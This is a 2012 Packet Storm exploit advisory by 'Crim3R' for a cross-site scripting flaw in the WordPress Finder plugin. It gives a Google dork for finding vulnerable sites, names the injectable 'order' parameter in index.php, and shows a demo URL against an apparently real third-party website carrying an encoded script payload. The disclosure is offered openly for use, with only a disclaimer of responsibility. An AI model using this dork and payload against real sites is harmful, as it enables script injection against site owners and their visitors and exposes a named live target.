WordPress Finder Cross Site Scripting

2012-08-25T00:00:00
ID PACKETSTORM:115902
Type packetstorm
Reporter Crim3R
Modified 2012-08-25T00:00:00

Description

                                        
                                            `###################################################################################  
  
# Exploit Title: Wordpress Finder Cross Site Scripting Vulnerability  
#  
# Google Dork: inurl:wp-content/plugins/finder/  
#  
# Date: 08/24/2012  
#  
# Author: Crim3R  
#  
# Tested on: all  
#  
###################################################################################  
  
$  
$ ----Author will be not responsible for any damage----  
$  
###################################################################################  
  
  
========================================  
the order parametr is Vulnerable to Xss in index.php file   
index.php?by=type&dir=[dir]&order=[xss]  
D3M0 :   
http://andyrutter.com/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(0);%3C/script%3E  
  
  
===============Crim3R@Att.Net===========  
  
$home = %00  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir   
  
`